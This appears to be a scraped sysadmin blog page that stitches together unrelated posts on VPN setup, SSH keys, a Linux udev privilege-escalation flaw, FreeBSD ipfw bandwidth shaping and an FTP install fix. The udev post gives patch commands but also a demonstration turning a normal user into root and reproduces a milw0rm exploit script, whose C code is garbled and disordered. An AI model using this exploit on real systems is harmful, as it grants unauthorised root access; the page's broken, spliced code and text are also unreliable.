Many ppl found that installing VPN on linux is not that easy, the abvailable installation guides on VPN is often limited. I have tried a lot of installation guides and finally get it connected successfully.
Here are the steps to guide you installed a secure connection between your? CentOS5 and Windows with OpenVPN open source application.
1.生成ssh 证书(ssh-keygen) ssh-keygen -t rsa
2.然后将私钥和公钥传输到你的电脑。
3.使用SecureCRT用证书登录SSH,奇怪SecureCRT用的是公钥做登录验证。
[ad#ad_article_2]
继续阅读 »
Linux的udev程序再爆本地提权漏洞,本地用户可以轻易获得root权限,请立即更新udev程序。(2.4内核系统不受影响)
修复方法(修复前请备份重要数据):
debian用户请执行apt-get update ; apt-get upgrade -y
centos用户请执行yum update udev
RedHat用户请使用官方rpm包更新或者购买RedHat的satellite服务。
攻击效果展示:
1. 在LINUX目录下建立test 帐户
2.下载 a脚本 在
http://milw0rm.com/exploits/8478
3.查看UDEV的PID 方法一: 先cat /proc/net/netlink
ffff810077587400 15 364 ffffffff 0 0 0000000000000000 2
ffff810037f81000 16 0 00000000 0 0 0000000000000000 2
ffff810077078400 18 0 00000000 0 0 0000000000000000 2
那个364就是 UDEV的进程,如果出现很多不知道哪一个用方法2
方法二:
另外最好通过ps aux | grep udev获取pid 为365,然后再-1,把这个参数传给A脚本
然后在test 用户的当前目录里
按以下步骤运行
[haha@localhost ~]$ id
uid=501(haha) gid=502(haha) groups=502(haha)
[haha@localhost ~]$sh a 364
(据笔者测试,这里的364可以由任意字符替代,亦可成功。)
suid.c: In function ‘main’:
suid.c:3: warning: incompatible implicit declaration of built-in function ‘execl’
sh-3.1# id
uid=0(root) gid=0(root) groups=502(haha)
此时的UID 变为0了 ,test用户已经变为 ROOT用户 可以继续以下
sh-3.1# bash
[root@localhost ~]#
看!test -> ROOT 用户大变身!!
现在确认的是此攻击方式对Debian和Ubuntu相当有效,对RedHat的攻击效果有待确认。
最新战况请查阅
http://baoz.net/linux-udev-exploit/
提权脚本:
http://milw0rm.com/exploits/8478
#!/bin/sh
# Linux 2.6
# bug found by Sebastian Krahmer
#
# lame sploit using LD technique
# by kcope in 2009
# tested on debian-etch,ubuntu,gentoo
# do a 'cat /proc/net/netlink'
# and set the first arg to this
# script to the pid of the netlink socket
# (the pid is udevd_pid - 1 most of the time)
# + sploit has to be UNIX formatted text 
# + if it doesn't work the 1st time try more often
#
# WARNING: maybe needs some FIXUP to work flawlessly
## greetz fly out to alex,andi,adize,wY!,revo,j! and the gang
cat > udev.c << _EOF #ifndef NETLINK_KOBJECT_UEVENT #define SHORT_STRING 64 int socket_fd; main(int argc, char **argv) { sprintf(event, "add"); memset(&address, 0, sizeof(address)); msg.msg_name = (void*)&address; socket_fd = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT); char message[LONG_STRING]; mp = message; iovector.iov_base = (void*)message; char *buf; sendmsg(socket_fd, &msg, 0); close(socket_fd); sleep(10); _EOF void _init() _EOF # milw0rm.com [2009-04-20]
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define NETLINK_KOBJECT_UEVENT 15
#endif
#define MEDIUM_STRING 128
#define BIG_STRING 256
#define LONG_STRING 1024
#define EXTRALONG_STRING 4096
#define TRUE 1
#define FALSE 0
struct sockaddr_nl address;
struct msghdr msg;
struct iovec iovector;
int sz = 64*1024;
char sysfspath[SHORT_STRING];
char subsystem[SHORT_STRING];
char event[SHORT_STRING];
char major[SHORT_STRING];
char minor[SHORT_STRING];
sprintf(subsystem, "block");
sprintf(sysfspath, "/dev/foo");
sprintf(major, "8");
sprintf(minor, "1");
address.nl_family = AF_NETLINK;
address.nl_pid = atoi(argv[1]);
address.nl_groups = 0;
msg.msg_namelen = sizeof(address);
msg.msg_iov = &iovector;
msg.msg_iovlen = 1;
bind(socket_fd, (struct sockaddr *) &address, sizeof(address));
char *mp;
mp += sprintf(mp, "%s@%s", event, sysfspath) +1;
mp += sprintf(mp, "ACTION=%s", event) +1;
mp += sprintf(mp, "DEVPATH=%s", sysfspath) +1;
mp += sprintf(mp, "MAJOR=%s", major) +1;
mp += sprintf(mp, "MINOR=%s", minor) +1;
mp += sprintf(mp, "SUBSYSTEM=%s", subsystem) +1;
mp += sprintf(mp, "LD_PRELOAD=/tmp/libno_ex.so.1.0") +1;
iovector.iov_len = (int)(mp-message);
int buflen;
buf = (char *) &msg;
buflen = (int)(mp-message);
execl("/tmp/suid", "suid", (void*)0);
}
gcc udev.c -o /tmp/udev
cat > program.c << _EOF
#include
#include
#include
#include
{
setgid(0);
setuid(0);
unsetenv("LD_PRELOAD");
execl("/bin/sh","sh","-c","chown root:root /tmp/suid; chmod +s /tmp/suid",NULL);
}
gcc -o program.o -c program.c -fPIC
gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles
cat > suid.c << _EOF
int main(void) {
setgid(0); setuid(0);
execl("/bin/sh","sh",0); }
_EOF
gcc -o /tmp/suid suid.c
cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
/tmp/udev $1
1.编释内核启用IPFIREWALL和IPFIVERT
编释内核启用DUMMYNET
2.cd /usr/src
make buildkernel KERNCONF=ConfigName
make installkernel KERNCONF=ConfigName
3.添加相应规则(此处添加的只为简单规则,末做安全设置)
ipfw -q add 00001 allow ip from 127.0.0.1 to 127.0.0.1 via lo0
ipfw -q add 00002 deny ip from 127.0.0.0/8 to any
ipfw -q add 00003 deny ip from any to 127.0.0.0/8
ipfw -q add 00004 deny ip from 1.1.1.0/24 to any in via rl0
ipfw -q add 20000 divert 8668 ip from any to any via rl0 (rl0为外网口,在rl0口上启用natd服务)
#创建相应相应通道。
ipfw -q add 30000 pipe 1 icmp from any to any
ipfw -q add 30101 pipe 4 tcp from any to any out
ipfw -q add 65535 allow ip from any to any
ipfw -q pipe 4 config mask dst-ip 0xffffffff bw 100KB/s queue 100Kbytes (匹配通道4里面的 每个目的地IP的带宽 《这儿的上的地IP。因为NAT过后,所以目的IP为内网的IP。》)
以下为ipfw pipe show (运行状态下面的通道显示)
00001: 1.000 Kbit/s 0 ms 10 sl. 1 queues (1 buckets) droptail
mask: 0×00 0×00000000/0×0000 -> 0×00000000/0×0000
BKT Prot ___Source IP/port____ ____Dest. IP/port____ Tot_pkt/bytes Pkt/Byte Drp
0 icmp 1.1.1.3/0 221.5.203.98/0 16983 12286764 0 0 0
00002: 320.000 Kbit/s 0 ms 20 sl. 1 queues (1 buckets) droptail
mask: 0×00 0×00000000/0×0000 -> 0×00000000/0×0000
BKT Prot ___Source IP/port____ ____Dest. IP/port____ Tot_pkt/bytes Pkt/Byte Drp
0 tcp 1.1.1.3/1035 207.46.193.254/80 386482 352842969 0 0 394
00003: 160.000 Kbit/s 0 ms 30 sl. 1 queues (1 buckets) droptail
mask: 0×00 0×00000000/0×0000 -> 0×00000000/0×0000
BKT Prot ___Source IP/port____ ____Dest. IP/port____ Tot_pkt/bytes Pkt/Byte Drp
0 tcp 192.168.1.15/1236 192.168.1.4/81 42383 40705903 0 0 0
00004: 800.000 Kbit/s 0 ms 100 KB 6 queues (64 buckets) droptail
mask: 0×00 0×00000000/0×0000 -> 0xffffffff/0×0000
BKT Prot ___Source IP/port____ ____Dest. IP/port____ Tot_pkt/bytes Pkt/Byte Drp
0 ip 0.0.0.0/0 1.1.1.2/0 45 5000 0 0 0
1 ip 0.0.0.0/0 1.1.1.3/0 6924 7229904 17 23793 0
5 ip 0.0.0.0/0 1.1.1.7/0 6978 9792770 14 19293 0
20 ip 0.0.0.0/0 192.168.1.4/0 9706 5759085 0 0 0
32 ip 192.168.1.4/0 0.0.0.0/0 4905 255108 0 0 0
54 ip 192.168.1.15/0 0.0.0.0/0 9804 14703104 0 0 0
运行结果:
Client1:
客户机1
密户机2:
服务端:
first: cd /usr/src/sys/i386/config
cp GENERIC MyKernel
and
vi MyKernel
add options or rm options
如果想要支持IPFirewall功能。需要添加以下一些options
今天准备让FreeBSD正式上线! 所以需要把系统安装到物理机中, 可是这台机器只有CDROM,而FreeBSD 6.4有3张CD。如果全下来刻盘就太浪费了,且以前我下过DVD版的。所以想通过FTP的方式来安装 。
用3CDaemon搭建了一个FTPserver ,可以系统在安装的时候 就是不能登录!!!
抓包一看,FreeBSD通过FTP方式安装的时候 ,使用的用户名是ftp,密码为installer@hostname
新建一个FTP用户 密码设成它所需要的,
安装就开始跑起来了!!!
编释自己的内核并安装后
重启 立马PING同段的机器 结果提示:Permission denied
远程 也不能SSH上去。 为了验证是不是网络问题了
so
ping 127.0.0.1 通了
ssh hostname 通了!
突然想起,我内核中启用了 ipfw,肯定是默认策略的问题
so
ipfw list
果然 里面就一条策略 还是deny any to any
丫丫的!
添加策略吧!!!
我郁闷中
freebsd# ipfw -q add 10 allow all from any to 127.0.0.0/8
ipfw: getsockopt(IP_FW_ADD): Protocol not available
哎,我又要重新编释内核
[ad#ad_article_2]
